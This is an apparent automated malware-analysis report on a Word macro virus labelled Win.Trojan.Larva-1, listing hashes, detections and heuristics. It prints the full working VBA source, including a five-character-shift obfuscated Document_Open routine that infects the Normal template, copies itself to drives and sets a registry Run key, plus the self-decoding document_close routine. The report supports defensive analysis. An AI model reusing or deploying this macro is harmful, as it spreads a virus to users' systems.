Win.Trojan.Larva-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 7336faa967bb8f0a…

MALICIOUS

Office (OLE)

39.5 KB Created: 2001-09-26 18:20:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 07ef57e17055cccb61a3fe8a83004236 SHA-1: cf4075f9e827bcdbeff46f7eed754e6f2d2f9be3 SHA-256: 7336faa967bb8f0a49f5dc8e5e9f8a22bee8d1f13bcc63ead306654922b697bd
220 Risk Score

Malware Insights

Win.Trojan.Larva-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with multiple signatures, including Win.Trojan.Larva-1 and Doc.Trojan.Zina-2. Critical heuristics indicate the presence of a Document_Open VBA macro that executes p-code, strongly suggesting it's designed to run malicious code upon opening. The VBA script itself is heavily obfuscated but its structure and the 'Document_Open' auto-execution point indicate it's intended to download and execute a secondary payload.

Heuristics 4

  • ClamAV: Win.Trojan.Larva-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Larva-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2820 bytes
SHA-256: 06ae3542700f98d5932b17724eae2c84e863eba9e8c9e72b5bd14978c9c327cd
Detection
ClamAV: Doc.Trojan.Zina-2
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open(): On Error Resume Next: Application.ScreenUpdating = False
'Nk%YmnxIthzrjsy%B%Fhyn{jIthzrjsy%Ymjs%Xjy%{}%B%StwrfqYjruqfyj%Jqxj%Xjy%{}%B%Fhyn{jIthzrjsy
'\nym%{}3[GUwtojhy3[GHtrutsjsyx-6.3HtijRtizqj
'%sfoin%B%3Qnsjx-<51%6.
'%{nwzx%B%Xywnslx3Ywnr-YmnxIthzrjsy3[GUwtojhy3[GHtrutsjsyx-6.3HtijRtizqj3Qnsjx-61%d
'%YmnxIthzrjsy3[GUwtojhy3[GHtrutsjsyx-6.3HtijRtizqj3HtzsyTkQnsjx..
'%%Nk%sfion%AC%',Qfw{f'%Ymjs
'%%%3ijqjyjqnsjx%61%3HtzsyTkQnsjx
'%%%3fiikwtrxywnsl%{nwzx
'%%Jsi%Nk
'Jsi%\nym
'Xjy%kx%B%HwjfyjTgojhy-'Xhwnuynsl3KnqjX~xyjrTgojhy'.
'Xjy%iwfo{t{n%B%kx3iwn{jx
'%Ktw%Jfhm%I%Ns%iwfo{t{n
'%%Nk%I3nxwjfi~%Ymjs
'%%%kx3htu~knqj%Fhyn{jIthzrjsy3KzqqSfrj1%I3iwn{jqjyyjw%+%'?a'1%Ywzj
'%%Jsi%Nk
'%Sj}y
'Tujs%'h?a\ns873{gx'%Ktw%Tzyuzy%Fx%(6
'%Uwnsy%(61%'ktw%f%B%6%yt%65'
'%%Uwnsy%(61%'Rxlgt}%''333Pfi%x{j%n lqjif%zrnwj1%tst%xj%zxy{fwn%wfiof''1{gX~xyjrRtifq1''333'''
'%Uwnsy%(61%'sj}y'
'Hqtxj%(6
'X~xyjr3Uwn{fyjUwtknqjXywnsl-''1%'MPJ^dQTHFQdRFHMNSJaXtky|fwjaRnhwtxtkya\nsit|xaHzwwjsy[jwxntsaWzs'1%'P87Xjy'.%B%'h?a\ns873{gx'
'Nk%If~-St|-..%B%<%Ymjs
'%Ithzrjsyx3Fii
'%%\nym%Xjqjhynts
'%%%3Yj}y%B%'PFI%X[J%N_LQJIF%IF%ZRNWJ1%TST%XJ%ZXY[FWN%WFIOF'%d
'%%%%%%%%%+%'%%%\R3Qfw{f%g~%Xujhnj%`Xujhnjx%[nwzx%Qfgxb%%%%'%d
'%%%%%%%%%+%'%%%%%%%%%%%%%%%%%%%7%5%5%6%%%%%%%%%%%%%%%%%%%%'
'%%%3GtqiWzs
'%%%3Xmfinsl3GfhplwtzsiUfyyjwsHtqtw%B%|iHtqtwGqfhp
'%%%3Xmfinsl3KtwjlwtzsiUfyyjwsHtqtw%B%|iHtqtw[ntqjy
'%%%3Htqqfuxj%Inwjhynts?B|iHtqqfuxjXyfwy
'%%Jsi%\nym
'Fhyn{jIthzrjsy3Fhyn{j\nsit|3UwnsyTzy%d
'Wfslj?B|iUwnsyKwtrYt1%Kwtr?B'6'1%Yt?B'65'
'Jsi%Nk
'Fuuqnhfynts3XhwjjsZuifynsl%B%Ywzj
End Sub
Private Sub document_close(): On Error Resume Next
For kd = 2 To 39
 okod = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(kd, 1)
 If Left(okod, 1) = "'" Then
  desni = Right(okod, Len(okod) - 1)
  ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine kd, desni
  For s = 1 To Len(desni)
   vracaj = vracaj & Chr(Asc(Mid(desni, s)) - 5)
   ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine kd, vracaj
  Next
  vracaj = ""
 End If
Next
Document_Open
For T = 2 To 39
 nkod = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(T, 1)
 If Left(nkod, 1) <> "'" Then
  duzina = Len(nkod)
  midl = Mid(nkod, 1, duzina)
  For o = 1 To duzina
   k = Left(midl, o)
   k2 = Chr(Asc(Mid(k, Len(k))) + 5)
   linija = linija & k2
   ThisDocument.VBProject.VBComponents(1).CodeModule.ReplaceLine T, "'" & linija
  Next
  linija = ""
 End If
Next
End Sub
'Larva

Open this report in the interactive analyzer, or submit your own file for analysis.